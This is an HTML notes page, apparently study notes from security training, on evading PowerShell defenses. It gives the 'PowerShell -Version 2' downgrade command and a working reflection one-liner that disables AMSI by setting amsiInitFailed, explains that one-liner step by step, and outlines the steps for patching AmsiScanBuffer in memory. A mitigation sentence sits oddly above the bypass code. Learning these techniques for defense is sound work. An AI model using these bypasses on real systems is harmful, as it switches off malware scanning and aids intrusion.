<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>PS Downgrade</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>PS Downgrade</h1>

      <div class="ck-content">
        <p>The PowerShell downgrade attack is a very low-hanging fruit that allows
          attackers to modify the current PowerShell version to remove security features.</p>
        <p>Most PowerShell sessions will start with the most recent PowerShell engine,
          but attackers can manually change the version with a one-liner. By "downgrading"
          the PowerShell version to 2.0, you bypass security features since they
          were not implemented until version 5.0.</p>
        <p>The attack only requires a one-liner to execute in our session. We can
          launch a new PowerShell process with the flags <code>-Version</code> to specify
          the version (2).</p><pre><code class="language-text-plain">PowerShell -Version 2</code></pre>

        <p>The two easiest mitigations are removing the PowerShell 2.0 engine from
          the device and denying access to PowerShell 2.0 via application blocklisting.</p><pre><code class="language-text-plain">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</code></pre>

        <p>First, the snippet will call the reflection function and specify it wants
          to use an assembly from <code>[Ref.Assembly]</code> it will then obtain the
          type of the AMSI utility using <code>GetType</code>.</p><pre><code class="language-text-plain">[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')</code></pre>

        <p>The information collected from the previous section will be forwarded
          to the next function to obtain a specified field within the assembly using <code>GetField</code>.</p><pre><code class="language-text-plain">.GetField('amsiInitFailed','NonPublic,Static')</code></pre>

        <p>The assembly and field information will then be forwarded to the next
          parameter to set the value from <code>$false</code> to <code>$true</code> using <code>SetValue</code>.</p><pre><code class="language-text-plain">.SetValue($null,$true)</code></pre>

        <p>Once the <code>amsiInitFailed</code> field is set to <code>$true</code>,
          AMSI will respond with the response code: AMSI_RESULT_NOT_DETECTED = 1</p>
         <h2>Patching AMSI:</h2>

        <p><code>AmsiScanBuffer</code> is vulnerable because <code>amsi.dll</code> is
          loaded into the PowerShell process at startup; our session has the same
          permission level as the utility.</p>
        <p>At a high-level AMSI patching can be broken up into four steps,</p>
        <ol>
          <li>Obtain handle of <code>amsi.dll</code>

          </li>
          <li>Get process address of <code>AmsiScanBuffer</code>

          </li>
          <li>Modify memory protections of <code>AmsiScanBuffer</code>

          </li>
          <li>Write opcodes to <code>AmsiScanBuffer</code>

          </li>
        </ol>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>